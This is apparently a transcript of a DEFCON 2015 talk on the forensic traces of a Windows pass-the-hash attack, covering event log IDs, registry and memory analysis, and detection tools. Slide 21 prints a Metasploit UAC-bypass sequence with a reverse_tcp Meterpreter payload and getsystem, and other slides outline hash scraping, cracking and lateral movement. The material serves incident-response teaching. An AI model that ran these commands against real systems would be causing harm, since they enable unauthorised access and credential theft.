Presentation is loading. Please wait.

Presentation is loading. Please wait.

Forensic Artifacts From A Pass The Hash (PtH) Attack

Published byJasper Glenn Modified over 8 years ago

Similar presentations

Presentation on theme: "Forensic Artifacts From A Pass The Hash (PtH) Attack"— Presentation transcript:

1 Forensic Artifacts From A Pass The Hash (PtH) Attack
By: GeRard Laygui

2 DISCLAIMER: The views and opinions expressed in this presentation are those of the author’s and does not necessarily represent the official policy or position of the company that the author works for.

3 What is a hash? A hash function is any function that can be used to map digital data of arbitrary size to digital data of fixed size. In the case of Windows, a password is stored in either a LanMan (LM) hash or NT LAN Manager (NTLM) hash format.

4 Where are hashes stored?
The Security Accounts Manager (SAM) database. Local Security Authority Subsystem (LSASS) process memory. Domain Active Directory Database (domain controllers only). The Credential Manager (CredMan) store. LSA Secrets in the registry.

5 Hash Examples Plaintext = password
LM Hash E52CAC67419A9A224A3B108F3FA6CB6D NTLM Hash 8846F7EAEE8FB117AD06BDD830B7586C

6 Pass the Hash (PtH) “Pass the hash is a hacking technique that allows an attacker to authenticate to a remote server/service by using the underlying NTLM and/or LanMan hash of a user's password, instead of requiring the associated plaintext password.” In this case, hash == password

7 Demo Environment - Logging Changes
Audit logon events - Success & Failure Audit account management - Success & Failure Audit account logon events - Success & Failure Audit process tracking - Success & Failure Audit system events - Success & Failure Increase log file sizes Microsoft Audit Policy Recommendations -

8 Demo Domain ImaUser ImaDomainAdmin S-1-5-21domain-500
Client Windows 7 Member Server W2K8 R2 W2K12 Domain Controller Client 2 Member Server 2 Windows 2012 Native Mode Domain Name: OHNOES.INTERNAL

9 Pass The hash attack sequence
Elevate Privilege Elevate Privilege Scrape Hashes Scrape Hashes Extract Active Directory Recon Recon Compromise Pass The Hash Pass The Hash Compromise initial system Leave backdoor if needed Elevate privilege from user to SYSTEM Scrape hashes from memory and disk Crack hashes offline in parallel with steps 5 and 6 Reconnaissance - Identify other systems to access with the stolen hashes. Lateral movement - access target systems using stolen hashes Repeat steps 2-6 till we get a Domain Admin account and dump the hashes from the domain controller Leave Backdoor (Optional) Crack Hashes (Optional)

10 Demo Pass The hash Backdoor enabled

11 Forensic Evidence Volatile Non-Volatile
At Least - Network (pcap, routes, netstat), Process List Best - RAM Memory Captures, hiberfil.sys VMWare - Suspend VM, use vmem file Non-Volatile At Least - Event Logs, Registry, Systeminfo Best - Disk Images VMWare - Use VMDK

12 Analysis Tools - Volatile
Dump Memory HBGary - FDPro Mandiant Memoryze Analyze Memory Volatility (Free) HBGary Responder Pro

13 Analysis Tools – Non-Volatile
Creating Disk Images Linux dd Encase FTK Analyze Disk Images The Sleuth Kit / Autopsy Log2Timeline

14 Compromise Windows Security Event Log (Process Audit Success)
Security Event ID 4688 Process Creation

15 Compromise Prefetch – Disk Artifact (Note: No artifacts if using a SSD or if using Windows Server OS) Time stamps reveal when a program was launched

16 Compromise Shim Cache Registry – regripper
Memory – volatility (shimcache switch)

17 Compromise Memory - Volatility Malfind command

18 Backdoor Windows Security Event Log - Persistence
Security Event ID User account created Security Event ID User added to groups

19 backdoor Registry (Regripper) Run Keys Service Install Date
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Service Install Date

20 Privilege escalation In order to scrape hashes, the attacker needs to change security context from user to Local System (SID S )

21 Privilege escalation Using Kali after I’ve already compromised the system using a Java exploit. meterpreter > run post/windows/gather/win_privs meterpreter > background msf exploit(java_signed_applet) > use exploit/windows/local/bypassuac msf exploit(bypassuac) > set SESSION 1 SESSION => 1 msf exploit(bypassuac) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(bypassuac) > set LHOST LHOST => msf exploit(bypassuac) > set LPORT 8088 LPORT => 8088 msf exploit(bypassuac) > exploit meterpreter > getuid Server username: OHNOES\ImaUser meterpreter > getsystem ...got system (via technique 1). Server username: NT AUTHORITY\SYSTEM

22 Privilege escalation

23 Scraping Hashes Service Install  Process Start

24 Scraping Hashes Service Install  Process Start

25 Scraping Hashes Volatility – consoles command

26 Cracking NT hashes John The Ripper OCLHashCat (GPU)
Ubuntu x AMD R9 290X can do Mh/s against NTLM, that is 183,528,000,000 tries per second*. Roughly 9 hours to crack an 8 character password

27 Recon Volatility – consoles or cmdscan

28 Recon – Apt Style

29 Lateral movement Event ID 4624 – Logon / Event ID 4634 - Logoff
Type 2 – Interactive Type 3 - Network Logon Type 10 – Remote Interactive (RDP)

30 Lateral movement RDP Pivot
Microsoft-Windows-TerminalServices-LocalSessionManager-Operational Event ID 21 (RDP Logon) Microsoft-Windows-TerminalServices-LocalSessionManager-Operational Event ID 25 (RDP Reconnect)

31 Lateral movement RDP Pivot Continued Default.rdp disk artifact
BMC Cache (bcache22.bmc)

32 Questions? This slide deck and related links for the videos will be eventually posted on: Cybersecology.com/DEFCON2015 Big thanks to Mike Landeck for allowing me to use his site!

Download ppt "Forensic Artifacts From A Pass The Hash (PtH) Attack"

Similar presentations

and Mitigations Brady Bloxham

and Mitigations Brady Bloxham
©2006 Microsoft Corporation. All rights reserved. Windows Vista Security Tidbits Steve Riley Senior Security Strategist Microsoft Corporation

©2006 Microsoft Corporation. All rights reserved. Windows Vista Security Tidbits Steve Riley Senior Security Strategist Microsoft Corporation
Learning to Live with an Advanced Persistent Threat

Learning to Live with an Advanced Persistent Threat
1 Preparing Windows 2000 installation (Week 3, Wednesday 2/25/2006) © Abdou Illia, Spring 2006.

1 Preparing Windows 2000 installation (Week 3, Wednesday 2/25/2006) © Abdou Illia, Spring 2006.
Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.

Module 6: Configuring Windows XP Professional to Operate in a Microsoft Network.
The Cain Tool Presented by: Sagar Chivate CS 685F.

The Cain Tool Presented by: Sagar Chivate CS 685F.
Lesson 17: Configuring Security Policies

Lesson 17: Configuring Security Policies
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Memory Forensics During Incident Response

Memory Forensics During Incident Response
11 SUPPORTING LOCAL USERS AND GROUPS Chapter 3. Chapter 3: Supporting Local Users and Groups2 SUPPORTING LOCAL USERS AND GROUPS  Explain the difference.

11 SUPPORTING LOCAL USERS AND GROUPS Chapter 3. Chapter 3: Supporting Local Users and Groups2 SUPPORTING LOCAL USERS AND GROUPS  Explain the difference.
Information Networking Security and Assurance Lab National Chung Cheng University F.I.R.E. Forensics & Incident Response Environment.

Information Networking Security and Assurance Lab National Chung Cheng University F.I.R.E. Forensics & Incident Response Environment.
Chapter 8 Chapter 8: Managing the Server Through Accounts and Groups.

Chapter 8 Chapter 8: Managing the Server Through Accounts and Groups.
2004, Jei F.I.R.E. Forensics & Incident Response Environment Information Networking Security and Assurance Lab National Chung Cheng University.

2004, Jei F.I.R.E. Forensics & Incident Response Environment Information Networking Security and Assurance Lab National Chung Cheng University.
Microsoft Server 2008 R2 Group Policies & Network Policy and Access Services.

Microsoft Server 2008 R2 Group Policies & Network Policy and Access Services.
Exposing the Secrets of Windows Credential Provider Presented By: Subrat Sarkar Give me your password.

Exposing the Secrets of Windows Credential Provider Presented By: Subrat Sarkar Give me your password.
Nothing is Safe 1. Overview  Why Passwords?  Current Events  Password Security & Cracking  Tools  Demonstrations Linux GPU Windows  Conclusions.

Nothing is Safe 1. Overview  Why Passwords?  Current Events  Password Security & Cracking  Tools  Demonstrations Linux GPU Windows  Conclusions.
Network and Active Directory Performance Monitoring and Troubleshooting NETW4008 Lecture 8.

Network and Active Directory Performance Monitoring and Troubleshooting NETW4008 Lecture 8.
Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.

Hacking Windows 2K, XP. Windows 2K, XP Review: NetBIOS name resolution. SMB - Shared Message Block - uses TCP port 139, and NBT - NetBIOS over TCP/IP.
Windows Security Mechanisms Al Bento - University of Baltimore.

Windows Security Mechanisms Al Bento - University of Baltimore.
MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.

MS systems use one of the following: LanManager Hash (LM) LanManager Hash (LM) NT LanManager (NTLM) NT LanManager (NTLM) Cached passwords Cached passwords.

Similar presentations

Ads by Google